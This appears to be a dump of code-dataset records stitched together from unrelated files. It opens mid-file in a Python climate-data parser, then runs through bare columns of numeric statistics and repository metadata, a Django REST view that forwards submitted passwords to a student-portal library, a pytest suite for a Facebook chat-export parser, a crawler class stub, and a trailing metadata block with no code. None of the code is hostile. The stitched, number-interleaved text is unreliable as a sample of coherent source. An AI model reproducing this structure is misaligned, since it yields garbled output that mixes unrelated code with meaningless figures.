                #for x in results: print("{:5.1f}: {} {}".format(round(sum(clmt[x.year][x.month]["snwd"]),1),calendar.month_abbr[x.month],x.year))
            if stat_type == "tavg":
                for x in results: print("{:5.1f}: {} {}".format(round(mean(clmt[x.year][x.month]["tempAVGlist"]), 1), calendar.month_abbr[x.month], x.year))
            if stat_type == "tmax":
                for x in results: print("{:5.1f}: {} {}".format(round(mean(clmt[x.year][x.month]["tmax"]), 1), calendar.month_abbr[x.month], x.year))
            if stat_type == "tmin":
                for x in results: print("{:5.1f}: {} {}".format(round(mean(clmt[x.year][x.month]["tmin"]), 1), calendar.month_abbr[x.month], x.year))
    else:   # Just assessing individual days
        print("Total days where '{}' {} {}: {}".format(stat_type, op, value, len(results)))
        if len(results) <= 50: stillprint = True
        else:
            stillpr = input("print results? ('y'/'n'): ")
            if stillpr == "y": stillprint = True
            else: stillprint = False
        if stillprint == True:
            if stat_type == "prcp":
                for x in results: print("{:>5.2f}: {}".format(float(clmt[x.year][x.month][x.day].prcp), x))
            if stat_type == "snow":
                for x in results: print("{:>5.1f}: {}".format(float(clmt[x.year][x.month][x.day].snow), x))
            if stat_type == "snwd":
                for x in results: print("{:>5.1f}: {}".format(float(clmt[x.year][x.month][x.day].snwd), x))
            if stat_type == "tmax":
                for x in results: print("{:>3}: {}".format(clmt[x.year][x.month][x.day].tmax, x))
            if stat_type == "tmin":
                for x in results: print("{:>3}: {}".format(clmt[x.year][x.month][x.day].tmin, x))
    print("")
def corrections():
    """Activates correction mode: interactively amend flagged daily readings.

    Prompts for comma-separated corrections (year,month,day,"attr",value),
    applies each to the in-memory record (clearing that reading's quality
    flag), then writes the full amended record to "APPENDED_<FILE>" (same
    column layout as the source csv) and a change-log to
    "CHG_<timestamp>_<FILE>".
    """
    print("CORRECTIONS MODE ACTIVATED - {}".format(clmt["station_name"]))
    print("------------------------------------------------")
    print("* Input a comma-separated list of the Year, Month, Date, Attribute, and new reading")
    print("* Ex: INPUT CORRECTION: 1899,1,30,\"prcp\",2.02")
    print("* When finished, type DONE and press enter")
    fix = []    # change-log rows: daystr + the one amended column
    while True:
        inp = input("INPUT CORRECTION: ").split(",")
        if inp[0].upper() == "DONE" or inp[0] == "":
            break
        elif len(inp) != 5:
            print("* not enough data given. Try again *")
        elif any(x.isdigit() == False for x in inp[0:3]):
            print("* Dates entered must be numeric. Try again.")
        elif inp[3].strip('"') not in ["prcp","snow","snwd","tmax","tmin"]:
            # FIX: the old message only had four placeholders, silently dropping 'tmin'
            print("* Invalid Attr. Valid Attributes: '{}','{}','{}','{}','{}'".format("prcp","snow","snwd","tmax","tmin"))
        else:
            y = int(inp[0])
            m = int(inp[1])
            d = int(inp[2])
            if y not in clmt or m not in clmt[y] or d not in clmt[y][m]:
                print("* No valid entry for {}-{}-{} exists. Try again".format(y, m, d))
            else:
                day = clmt[y][m][d]         # the record being amended
                attr = inp[3].strip('"')
                try:
                    if attr == "prcp":
                        round(float(inp[4]), 2)     # validation only: raises if the new value isn't numeric
                        if day.prcpQ == "":
                            print("HEADS UP! {} already had no PRCP quality flag".format(day.daystr))
                        day.prcp = inp[4]
                        day.prcpQ = ""              # verified by the user; clear the quality flag
                        fix.append("{},{},,,,".format(day.daystr, inp[4]))
                        print("   Amendment for {} PRCP successful: {}".format(day.daystr, inp[4]))
                    if attr == "snow":
                        round(float(inp[4]), 1)     # validation only
                        if day.snowQ == "":
                            print("HEADS UP! {} already had no SNOW quality flag".format(day.daystr))
                        day.snow = inp[4]
                        day.snowQ = ""
                        fix.append("{},,{},,,".format(day.daystr, inp[4]))
                        print("   Amendment for {} SNOW successful: {}".format(day.daystr, inp[4]))
                    if attr == "snwd":
                        round(float(inp[4]), 1)     # validation only
                        if day.snwdQ == "":
                            print("HEADS UP! {} already had no SNWD quality flag".format(day.daystr))
                        day.snwd = inp[4]
                        day.snwdQ = ""
                        fix.append("{},,,{},,".format(day.daystr, inp[4]))
                        print("   Amendment for {} SNWD successful: {}".format(day.daystr, inp[4]))
                    if attr == "tmax":
                        int(inp[4])                 # validation only (temps are whole degrees)
                        if day.tmaxQ == "":
                            print("HEADS UP! {} already had no TMAX quality flag".format(day.daystr))
                        day.tmax = inp[4]
                        day.tmaxQ = ""
                        fix.append("{},,,,{},".format(day.daystr, inp[4]))
                        print("   Amendment for {} TMAX successful: {}".format(day.daystr, inp[4]))
                    if attr == "tmin":
                        int(inp[4])                 # validation only
                        if day.tminQ == "":
                            print("HEADS UP! {} already had no TMIN quality flag".format(day.daystr))
                        day.tmin = inp[4]
                        day.tminQ = ""
                        fix.append("{},,,,,{}".format(day.daystr, inp[4]))
                        print("   Amendment for {} TMIN successful: {}".format(day.daystr, inp[4]))
                except Exception:
                    # bad numeric input for the new reading; was a bare except
                    print("Hmm. Double check your input value. Try again")
    if len(fix) > 0:
        # Re-emit the entire (amended) record using the source csv's column layout
        with open("APPENDED_" + FILE, "w") as f:
            f.write('"STATION","NAME","LATITUDE","LONGITUDE","ELEVATION","DATE","PRCP","PRCP_ATTRIBUTES","SNOW","SNOW_ATTRIBUTES","SNWD","SNWD_ATTRIBUTES","TMAX","TMAX_ATTRIBUTES","TMIN","TMIN_ATTRIBUTES"\n')
            for yr in [YR for YR in clmt if type(YR) == int]:
                for mo in [MO for MO in clmt[yr] if type(MO) == int]:
                    for dy in [DY for DY in clmt[yr][mo] if type(DY) == int]:
                        day = clmt[yr][mo][dy]
                        f.write('"{}",'.format(day.stationid))
                        f.write('"{}",'.format(day.station_name))
                        f.write('"{}",'.format(day.station_lat))
                        f.write('"{}",'.format(day.station_lon))
                        f.write('"{}",'.format(day.station_elev))
                        f.write('"{}",'.format(day.daystr))
                        f.write('"{}",'.format(day.prcp))
                        f.write('"{},{},{},{}",'.format(day.prcpM, day.prcpQ, day.prcpS, day.prcpT))
                        f.write('"{}",'.format(day.snow))
                        f.write('"{},{},{},{}",'.format(day.snowM, day.snowQ, day.snowS, day.snowT))
                        f.write('"{}",'.format(day.snwd))
                        f.write('"{},{},{},{}",'.format(day.snwdM, day.snwdQ, day.snwdS, day.snwdT))
                        f.write('"{}",'.format(day.tmax))
                        f.write('"{},{},{},{}",'.format(day.tmaxM, day.tmaxQ, day.tmaxS, day.tmaxT))
                        f.write('"{}",'.format(day.tmin))
                        f.write('"{},{},{},{}"\n'.format(day.tminM, day.tminQ, day.tminS, day.tminT))
        # FIX: the message previously said "AMENDED_<FILE>" but the file written
        # above is "APPENDED_<FILE>"
        print("Output of '{}' finished!".format("APPENDED_" + FILE))
    else:
        return print("::: NO VALUES CHANGED :::")
    if len(fix) > 0:
        # Also write a timestamped change-log of just the amended readings
        timenow = datetime.datetime.now()
        timestr = "{:%Y%m%d_%H%M}".format(timenow)
        with open("CHG_" + timestr + "_" + FILE, "w") as f:
            f.write("{},{},{},{},{},{}\n".format("DAY","PRCP","SNOW","SNWD","TMAX","TMIN"))
            for each in fix:
                f.write(each)
                f.write("\n")
        print("Output of '{}' finished!".format("CHG_" + timestr + "_" + FILE))
def clmthelp():
    """An extensive list within the script of available functions to the user
    """
    # print("* PLEASE SEE README.md FOR A FULL BREAKDOWN OF PROGRAM'S CAPABILITIES *")
    # --- getting started -------------------------------------------------
    for x in wrap("* TO START: -When you start, the clmtmenu() function automatically runs. If canceled, simply run the function again. it displays all csv's in the folder",width=78,subsequent_indent="    "):
        print(x)
    print("    -takes optional keyword argument <city>")
    # --- climatology configuration variables -----------------------------
    for x in wrap("CLIMATOLOGY VARIABLES: At the end of the script, you'll see two variables: climatology and increment. These are strictly used in the Report functions. The former is to allow the user to modify the length of climatologies (so if you want to assess them at 10, 20, or even 50-yr); the latter controls the frequency of the assessment",width=78,subsequent_indent="    "):
        print(x)
    print("    climatology = 30    # Default Climatology Length in reports")
    print("    increment = 5   # Default running-mean increment")
    # --- record-count thresholds -----------------------------------------
    for x in wrap("RECORD THRESHOLDS: At the end of the script, you'll find record thresholds. These are controls employed whilst running report/rank functions to prevent partial years/months/weeks from polluting the overall data if it would affect it",width=78,subsequent_indent="    "):
        print(x)
    print("    DEFAULT VALUES (can be modified before or after compiling the data):")
    print("    excludeyear = 300   # Exclude years from ranking/reports if ")
    print("                          year recordqty <= to this threshold")
    print("    excludemonth = 20   # Exclude months from ranking/reports if")
    print("                          month recordqty <= to this threshold")
    print("    excludeweek = 4     # Exclude weeks from ranking/reports if")
    print("                          week recordqty <= to this threshold")
    print("    excludecustom = .75 # Exclude custom periods from ranking or")
    print("                          reports if week recordqty <= 75% of a")
    print("                          threshold")
    print("DAILY SUMMARIES:")
    print("    -- daySummary(y1,m1,d1,*[y2,m2,d2]) :: Dumps a list of day-by-day data in a given range of dates")
    # --- quality-flag / error-handling help ------------------------------
    print("ERRORS OVERVIEW:")
    print("    -- Run qflagCheck() to get the code and definition for various quality flags in the record")
    print("    -- Run errorStats() to get get a report on errors that might be worth veryfying the data for.")
    print("       * this function will report on every error unless it is a temperature with an 'I' flag.")
    print("         - These can be quite numerous. So won't be included in the report")
    print("       * by default, data with any type of quality flag will NOT be included in stats/reports")
    print("       * User can change these settings by one of two ways:")
    print("         - Find where the 'ignoreflags' list is in the script, and add or take away from the list")
    print("         - On the fly, with the command ignoreflags.append('<flag>') or ignoreflags.remove('<flag>')")
    print("       * using corrections(), It is possible to verify the data and remove the quality flag so it will be included")
    print("         - this process amends the data and outputs a new file; reload using clmtAnalyze() for best results")
    print("       * Please see README.md to read more about this process")
    # --- stats / report / rank function catalog --------------------------
    print("BUILT-IN FUNCTIONS: (these won't work until you run the clmtAnalyze function)")
    print("    -- dayStats(year,month,day) :: Returns a basic report for the specified day")
    print("    -- weekStats(year,month,day) :: Returns a basic weekly report; the included day will be the ")
    print("       center of the week")
    print("    -- monthStats(year,month) :: Returns a basic report for the specified month")
    print("    -- yearStats(year) :: Returns a basic report for the specified year")
    print("    -- metYearStats(year) :: Returns a basic report for the specified meteorological year")
    print("    -- seasonStats(year,season) :: Returns a basic report for the specified meteorological ")
    print("       season ('spring','summer','fall','winter')")
    print("    -- customStats(y1,m1,d1,*y2,*m2,*d2)")
    print("    Climatology Functions :: Detailed stats based on 30-yr climatologies incremented by")
    print("       5 years and enables basic climatological tendency analysis. These defaults can change as needed.")
    print("       see README for more details or use the help function on one of the variables")
    print("    -- dayReport(month,day) :: Returns detailed statistics and climatology for all specified")
    print("       days in the record")
    print("    -- weekReport(month,day) :: Returns detailed statistics and climatology for determined 7-day")
    print("       period and the included day will be the center of the week")
    print("    -- monthReport(month) :: Returns detailed statistics and climatology for the specified month")
    print("    -- yearReport() :: NOTHING is passed to this function. It returns detailed statistics based ")
    print("       on data for all years")
    print("    -- metYearReport() :: NOTHING is passed to this function. It returns detailed statistics based ")
    print("       on data for all meteorological years")
    print("    -- seasonReport(season) :: Returns detailed statistics and climatology for the specified season")
    print("    -- customReport(M1,D1,*[M2,D2]) :: Returns detailed statistics and climatology for the specified,")
    print("       custom period of time. The ending month and date are optional")
    print("    Rank/Record Functions")
    print("    -- dayRank(month,day,howmany) :: Prints daily records from the climate data.")
    print("    -- weekRank(month,day,howmany) :: Prints records based on a week's period, centered on the ")
    print("       day entered (3 days before; 3 after)")
    print("    -- monthRank(month,'<temps>|<rain>',howmany) :: Prints month-based records for the given month")
    print("    -- yearRank('<temps>|<rain>',howmany) :: Prints yearly-based records for the entire record (Jan-Dec)")
    print("    -- metYearRank('<temps>|<rain>',howmany) :: Prints meteorological-yearly-based records for the ")
    print("       entire record (Jan-Dec)")
    print("    -- seasonRank(season,'<temps>|<rain>',howmany) :: Prints season-based records for the inquired season")
    print("    -- customRank(attribute,quantity,M1,D1,*[M2,D2]) :: Prints ranked-records for the inquired period of time")
    print("       The ending date is optional. This is a good function for proxy of a YTD function")
    print("    -- allDayRank('attribute',quantity,**{season,year,month,ascending}) :: compares all daily data on record.")
    print("       optional temporal keyword arguments accepted")
    print("    -- allMonthRank(attribute,quantity,**{season,ascending}) :: compares all monthly data on record to one")
    print("       another. Optional keyword arguments of <season> or <ascending=True> are accepted")
def clmtmenu():
    """Enables the user to select which csv file (as such, which city) that
    they'd like to load/mount into the program; automatically ran at
    initilization of the script, but can be ran at anytime; replaces the
    csvFileList() function.

    clmtmenu()
    """
    # Offer every *csv in the cwd, excluding the report files this script emits
    # (matched by their fixed 9-character filename prefixes)
    tempcsvlist = os.listdir()
    csvs_in_dir = [x for x in tempcsvlist if x[len(x)-3:] == "csv" and x[0:9] not in ["dayReport","weekRepor","monthRepo","yearRepor","seasonRep","metYearRe","customRep"]]
    selection = False   # Will cause the function to wait until an accepted answer is input
    print("**********************************************************")
    print("   CLIMATE PARSER (clmt-parser.py) v2.9x")
    print("   by K. Gentry (ksgwxfan)")
    print("**********************************************************")
    print("- Make selection and press <ENTER>; type-in cancel to exit function")
    print("- Run this function again by entering clmtmenu()")
    print("- OPTIONAL: enter in a custom city name (useful if the file has")
    print("    multiple stations). Just separate by a comma.")
    print("    Example --> Enter Selection: 2, CITY")
    print("-----------------------------------------------------------")
    for each in csvs_in_dir:
        print("{:>3}. {}".format(csvs_in_dir.index(each) + 1,each))
    print("-----------------------------------------------------------")
    while selection == False:   # only jumps out of while-loop if answer is valids
        userselection = input("Enter Selection: ")
        userselection = userselection.split(",")
        # valid answers: an in-range 1-based file number, or the word "cancel"
        if userselection[0].isnumeric() and int(userselection[0]) > 0 and int(userselection[0]) <= len(csvs_in_dir) or userselection[0].lower() == "cancel":
            selection = True
        else:
            print("OOPS! Invalid selection. Try again!")
    if len(userselection) >= 2:
        # Everything after the file number is re-joined into a custom city name
        citystr = userselection[1].strip(" ")
        for x in range(2,len(userselection)):
            citystr = citystr + ", " + userselection[x].strip(" ")
    if userselection[0].lower() != "cancel":
        if len(userselection) == 1:
            clmtAnalyze(csvs_in_dir[int(userselection[0])-1])
        else:
            #citystr = userselection[1].strip(" ") + ", " + userselection[2].strip(" ")
            clmtAnalyze(csvs_in_dir[int(userselection[0])-1],city=citystr)

# MAIN PROGRAM --------------------------------------------------------------
clmt = {}       # year -> month -> day records, plus station metadata keys ("station", "station_name", ...)
metclmt = {}    # meteorological-year variant of clmt (holds per-season "valid" month lists)
# reading-value -> [dates] lookup tables used by the rank/search functions
clmt_vars_days = {"prcp":{},"snow":{},"snwd":{},"tavg":{},"tmax":{},"tmin":{}}
clmt_vars_months = {"prcp":{},"prcpDAYS":{},"snow":{},"snowDAYS":{},"snwd":{},"snwdDAYS":{},"tavg":{},"tmax":{},"tmin":{}}
station_ids = []
FILE = None     # filename of the csv currently loaded (set by clmtAnalyze — TODO confirm)
# Threshold Quantities
ignoreflags = [""]  # If there are Quality Flags that you wish to ignore, place them here (or append upon starting; see README)
excludeyear = 300   # Exclude years from ranking/reports if year recordqty <= to this threshold
excludeseason = 70  # Exclude season from rankings/reports if season recordqty <= to this threshold
excludemonth = 20   # Exclude months from ranking/reports if month recordqty <= to this threshold
excludeweek = 4     # Exclude weeks from ranking/reports if week recordqty <= to this threshold
excludecustom = .75 # Excludes custom periods if recordqty isn't at least this percentage of threshold
# tempAVGlist Threshold Quantities (DO NOT TOUCH!!! these are handled from above variables)
excludeyear_tavg = excludeyear * 2
excludeseason_tavg = excludeseason * 2
excludemonth_tavg = excludemonth * 2
excludeweek_tavg = excludeweek * 2

clmtmenu()
# li = sorted([{"year":y,"month":m,"snwdDAYS":clmt[y][m]["snwdDAYS"]} for y in clmt if type(y) == int for m in clmt[y] if type(m) == int and clmt[y][m]["snwdDAYS"] > 0],key=lambda x:x["snwdDAYS"],reverse=True)
79.613121
409
0.539487
80,256
578,867
3.821322
0.015164
0.02752
0.019682
0.014129
0.892303
0.864033
0.835016
0.790703
0.74071
0.690848
0
0.035555
0.234651
578,867
7,271
410
79.613121
0.656129
0.072291
0
0.459629
0
0.021273
0.200796
0.008703
0
0
0
0
0
1
0.008058
false
0.008703
0.001773
0
0.014021
0.1639
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
1af65582e33d661350f89fb423af1d29e91ecbdb
1,487
py
Python
main/views.py
nishantc7/iterapi-web
515e43a45b1459baa5a05dcb5446ed1524d37998
[ "MIT" ]
4
2020-05-05T14:12:42.000Z
2020-06-13T11:15:52.000Z
main/views.py
nishantc7/iterapi-web
515e43a45b1459baa5a05dcb5446ed1524d37998
[ "MIT" ]
6
2020-05-05T13:19:48.000Z
2021-09-22T18:58:20.000Z
main/views.py
nishantc7/iterapi-web
515e43a45b1459baa5a05dcb5446ed1524d37998
[ "MIT" ]
1
2020-06-13T11:16:36.000Z
2020-06-13T11:16:36.000Z
from rest_framework import generics from rest_framework.response import Response from iterapi import Student from rest_framework.parsers import JSONParser from main.serializer import UserSerializer class MainView(generics.CreateAPIView): parser_classes = [JSONParser] serializer_class = UserSerializer def post(self, request): user_id = request.data['user_id'] password = request.data['password'] st = Student(user_id, password) return Response(st.getAttendance()) class ResultView(generics.CreateAPIView): parser_classes = [JSONParser] serializer_class = UserSerializer def post(self, request): user_id = request.data['user_id'] password = request.data['password'] sem = request.data['sem'] st = Student(user_id, password) return Response(st.getDetailedResult(sem)) class InfoView(generics.CreateAPIView): parser_classes = [JSONParser] serializer_class = UserSerializer def post(self, request): user_id = request.data['user_id'] password = request.data['password'] st = Student(user_id, password) return Response(st.getInfo()) class CgpaView(generics.CreateAPIView): parser_classes = [JSONParser] serializer_class = UserSerializer def post(self, request): user_id = request.data['user_id'] password = request.data['password'] st = Student(user_id, password) return Response(st.getResult())
29.156863
50
0.696032
163
1,487
6.208589
0.220859
0.071146
0.110672
0.134387
0.711462
0.711462
0.711462
0.711462
0.672925
0.672925
0
0
0.209146
1,487
50
51
29.74
0.860544
0
0
0.631579
0
0
0.042367
0
0
0
0
0
0
1
0.105263
false
0.210526
0.131579
0
0.657895
0
0
0
0
null
0
0
0
0
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
6
2128761b912dafc74f58f16adbf28832a7b51fe6
12,064
py
Python
test/test_3_rules.py
nick-killeen/demuxfb
9c9a89c3b3116add018f98ef9e11ae335395692a
[ "MIT" ]
null
null
null
test/test_3_rules.py
nick-killeen/demuxfb
9c9a89c3b3116add018f98ef9e11ae335395692a
[ "MIT" ]
null
null
null
test/test_3_rules.py
nick-killeen/demuxfb
9c9a89c3b3116add018f98ef9e11ae335395692a
[ "MIT" ]
null
null
null
""" Test a subset of chat construction rules against *my* current expectations. These should not be considered formal tests. They are just an artifact of exploratory sanity testing, distrubted only for completeness. There is no formal spec. This file should not be maintained. Throw it out when the Facebook exporter updates """ import sys from .helpers import SpoofChatFeed sys.path.append('src/') import demuxfb # nopep8 pylint: disable=wrong-import-position def test_match_media_message(): chat_feed = SpoofChatFeed() chat_feed.push(photos=[{'uri': 'messages/inbox/convo/photos/blah.png', 'creation_timestamp': 1000}]) chat_feed.push(content='What do these mean?', photos=[{'uri': 'messages/inbox/convo/photos/blah.png', 'creation_timestamp': 1000}, {'uri': 'messages/inbox/convo/photos/blah1.png', 'creation_timestamp': 2000}]) chat_feed.push(gifs=[{'uri': 'messages/inbox/convo/gifs/blah.gif'}]) chat_feed.push(audio_files=[{'uri': 'messages/inbox/convo/audio/blah.mp4', 'creation_timestamp': 1000}]) chat_feed.push(videos=[{'uri': 'messages/inbox/convo/videos/blah.mp4', 'creation_timestamp': 1000, 'thumbnail': { 'uri': 'messages/inbox/convo//videos/thumbnails' '/blarg.jpg' }}]) chat_feed.push(files=[{'uri': 'messages/inbox/convo/videos/blah.mp4', 'creation_timestamp': 1000}]) chat_feed.push(sticker={'uri': 'messages/stickers_used/blah.png'}) chat = demuxfb.build_chat(chat_feed, 'John Smith') messages = chat.messages message = messages.pop(0) assert isinstance(message, demuxfb.message.MediaMessage) assert message.content is None assert len(message.photos) == 1 assert len(message.gifs) == 0 assert len(message.audio_files) == 0 assert len(message.videos) == 0 assert len(message.attachment_files) == 0 assert len(message.stickers) == 0 message = messages.pop(0) assert isinstance(message, demuxfb.message.MediaMessage) assert message.content == 'What do these mean?' 
assert len(message.photos) == 2 message = messages.pop(0) assert isinstance(message, demuxfb.message.MediaMessage) assert len(message.photos) == 0 assert len(message.gifs) == 1 message = messages.pop(0) assert isinstance(message, demuxfb.message.MediaMessage) assert len(message.audio_files) == 1 message = messages.pop(0) assert isinstance(message, demuxfb.message.MediaMessage) assert len(message.videos) == 1 message = messages.pop(0) assert isinstance(message, demuxfb.message.MediaMessage) assert len(message.attachment_files) == 1 message = messages.pop(0) assert isinstance(message, demuxfb.message.MediaMessage) assert len(message.stickers) == 1 def test_match_empty_message(): chat_feed = SpoofChatFeed() chat_feed.push() chat = demuxfb.build_chat(chat_feed, 'John Smith') messages = chat.messages message = messages.pop(0) assert isinstance(message, demuxfb.message.EmptyMessage) def test_call_messages(): chat_feed = SpoofChatFeed() chat_feed.push(content='John started a video chat.') chat_feed.push(content='John joined the video chat.') chat_feed.push(content='The video chat ended.') chat_feed.push(content='John started a call.') chat_feed.push(content='John joined the call.') chat_feed.push(content='The call ended.') chat_feed.push(content='John started a call.') chat_feed.push(content='John joined the call.') chat_feed.push(content='The call ended.') chat = demuxfb.build_chat(chat_feed, 'Jake Smith') messages = chat.messages message = messages.pop(0) assert isinstance(message, demuxfb.message.CallStartMessage) assert message.call_type == demuxfb.message.CallType.VIDEO message = messages.pop(0) assert isinstance(message, demuxfb.message.CallJoinMessage) assert message.call_type == demuxfb.message.CallType.VIDEO message = messages.pop(0) assert isinstance(message, demuxfb.message.CallEndMessage) assert message.call_type == demuxfb.message.CallType.VIDEO message = messages.pop(0) assert isinstance(message, demuxfb.message.CallStartMessage) assert message.call_type == 
demuxfb.message.CallType.AUDIO message = messages.pop(0) assert isinstance(message, demuxfb.message.CallJoinMessage) assert message.call_type == demuxfb.message.CallType.AUDIO message = messages.pop(0) assert isinstance(message, demuxfb.message.CallEndMessage) assert message.call_type == demuxfb.message.CallType.AUDIO def test_match_nickname_change_message(): chat_feed = SpoofChatFeed() chat_feed.push(sender_name='Joseph', content='Joseph cleared his own nickname.') chat_feed.push(sender_name='Joseph', content='Joseph cleared your nickname.') chat_feed.push(sender_name='Joseph', content='Joseph cleared the nickname for Jacob.') chat_feed.push(sender_name='Joseph', content='Joseph set the nickname for Jacob to Jake.') chat_feed.push(sender_name='Joseph', content='Joseph set your nickname to John.') chat_feed.push(sender_name='Joseph', content='Joseph set their own nickname to Joe.') chat_feed.push(content='You cleared your nickname.') chat_feed.push(content='You cleared the nickname for Joseph.') chat_feed.push(content='You set the nickname for Joseph to Joe.') chat_feed.push(content='You set your nickname to John.') chat = demuxfb.build_chat(chat_feed, 'John Smith') messages = chat.messages joseph = chat.get_participant('Joseph') jacob = chat.get_participant('Jacob') message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter == joseph assert message.subject == joseph assert message.new_nickname is None message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter == joseph assert message.subject.is_me() assert message.new_nickname is None message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter == joseph assert message.subject == jacob assert message.new_nickname is None message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter == joseph assert 
message.subject == jacob assert message.new_nickname == 'Jake' message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter == joseph assert message.subject.is_me() assert message.new_nickname == 'John' message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter == joseph assert message.subject == joseph assert message.new_nickname == 'Joe' message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter.is_me() assert message.subject.is_me() assert message.new_nickname is None message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter.is_me() assert message.subject == joseph assert message.new_nickname is None message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter.is_me() assert message.subject == joseph assert message.new_nickname == 'Joe' message = messages.pop(0) assert isinstance(message, demuxfb.message.NicknameChangeMessage) assert message.setter.is_me() assert message.subject.is_me() assert message.new_nickname == 'John' def test_match_chat_settings_change_message(): chat_feed = SpoofChatFeed() chat_feed.push(content='Jacob named the group Saturday Hangout.') chat_feed.push(content='Jacob changed the group photo.') chat_feed.push(content='Jacob changed the chat theme.') chat_feed.push(content=r'Jacob set the emoji to \u00f0\u009f\u008d\u00ba.') chat_feed.push(content='Jacob turned on member approval and will review' ' requests to join the group.') chat_feed.push(content='Jacob turned off member approval. 
Anyone with the' ' link can join the group.') chat = demuxfb.build_chat(chat_feed, 'John Smith') messages = chat.messages message = messages.pop(0) assert isinstance(message, demuxfb.message.ChatSettingsChangeMessage) assert message.settings_type == demuxfb.message.ChatSettingsType.CHANGE_NAME assert message.new_name == 'Saturday Hangout' assert message.new_emoji is None assert message.new_approval_is_required_policy is None message = messages.pop(0) assert isinstance(message, demuxfb.message.ChatSettingsChangeMessage) assert message.settings_type == \ demuxfb.message.ChatSettingsType.CHANGE_PHOTO assert message.new_name is None message = messages.pop(0) assert isinstance(message, demuxfb.message.ChatSettingsChangeMessage) assert message.settings_type == \ demuxfb.message.ChatSettingsType.CHANGE_THEME message = messages.pop(0) assert isinstance(message, demuxfb.message.ChatSettingsChangeMessage) assert message.settings_type == \ demuxfb.message.ChatSettingsType.CHANGE_EMOJI assert message.new_emoji == r'\u00f0\u009f\u008d\u00ba' message = messages.pop(0) assert isinstance(message, demuxfb.message.ChatSettingsChangeMessage) assert message.settings_type == \ demuxfb.message.ChatSettingsType.CHANGE_MEMBERSHIP_POLICY assert message.new_approval_is_required_policy message = messages.pop(0) assert isinstance(message, demuxfb.message.ChatSettingsChangeMessage) assert message.settings_type == \ demuxfb.message.ChatSettingsType.CHANGE_MEMBERSHIP_POLICY assert message.new_approval_is_required_policy is not None assert not message.new_approval_is_required_policy def test_plan_messages(): chat_feed = SpoofChatFeed() chat_feed.push(content='Joseph responded ') chat_feed.push(content='Jacob started a plan.') chat_feed.push(content='Jacob named the plan Saturday Hangout.') chat_feed.push(content='Jacob updated the plan to Sat, Aug 5 at 12 PM.') chat_feed.push(content='Joseph responded ') chat_feed.push(content='Jacob deleted the plan Saturday Hangout for Sat,' ' Aug 5 at 12 PM.') 
chat_feed.push(content='Joseph responded ') chat = demuxfb.build_chat(chat_feed, 'John Smith') messages = chat.messages message = messages.pop(0) assert isinstance(message, demuxfb.message.TextMessage) message = messages.pop(0) assert isinstance(message, demuxfb.message.PlanCreationMessage) message = messages.pop(0) assert isinstance(message, demuxfb.message.PlanUpdateMessage) assert message.new_plan_title == 'Saturday Hangout' assert message.new_plan_time is None message = messages.pop(0) assert isinstance(message, demuxfb.message.PlanUpdateMessage) assert message.new_plan_title is None assert message.new_plan_time == 'Sat, Aug 5 at 12 PM' message = messages.pop(0) assert isinstance(message, demuxfb.message.PlanRespondencyMessage) message = messages.pop(0) assert isinstance(message, demuxfb.message.PlanDeletionMessage) assert message.plan_title == 'Saturday Hangout' assert message.plan_time == 'Sat, Aug 5 at 12 PM' message = messages.pop(0) assert isinstance(message, demuxfb.message.TextMessage)
38.666667
80
0.704824
1,453
12,064
5.738472
0.13214
0.08887
0.057568
0.084313
0.830295
0.794195
0.752459
0.710242
0.679539
0.644519
0
0.011648
0.195872
12,064
311
81
38.790997
0.847851
0.030421
0
0.609959
0
0
0.153478
0.031568
0
0
0
0
0.448133
1
0.024896
false
0
0.012448
0
0.037344
0
0
0
0
null
0
0
0
1
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
6
213266dedf1be75a442f2d2d047405334de761d6
241
py
Python
code/library/daily_crawler.py
chosunghyun18/Stock_trading_bot
15223e4aff5f4c4ff064f09c161100dd649a79e7
[ "MIT" ]
3
2020-12-24T10:16:09.000Z
2022-03-02T16:17:58.000Z
code/library/daily_crawler.py
chosunghyun18/Stock_trading_bot
15223e4aff5f4c4ff064f09c161100dd649a79e7
[ "MIT" ]
null
null
null
code/library/daily_crawler.py
chosunghyun18/Stock_trading_bot
15223e4aff5f4c4ff064f09c161100dd649a79e7
[ "MIT" ]
null
null
null
from library.daily_craw_config import * class daily_crawler(): def __init__(self, db_name, daily_craw_db_name, daily_buy_list_db_name): self.cc = daily_craw_config(db_name, daily_craw_db_name, daily_buy_list_db_name)
26.777778
89
0.763485
39
241
4.076923
0.410256
0.226415
0.27673
0.188679
0.490566
0.490566
0.490566
0.490566
0.490566
0.490566
0
0
0.165975
241
8
90
30.125
0.791045
0
0
0
0
0
0
0
0
0
0
0
0
1
0.25
false
0
0.25
0
0.75
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
6
2152ac5ce747f783cca177369fadf7289001def4
544
py
Python
tests/test_decode_spec.py
Cologler/jsonxx-python
5a203b61d677085df1fcf8bb0146da9896bf840f
[ "MIT" ]
null
null
null
tests/test_decode_spec.py
Cologler/jsonxx-python
5a203b61d677085df1fcf8bb0146da9896bf840f
[ "MIT" ]
null
null
null
tests/test_decode_spec.py
Cologler/jsonxx-python
5a203b61d677085df1fcf8bb0146da9896bf840f
[ "MIT" ]
null
null
null
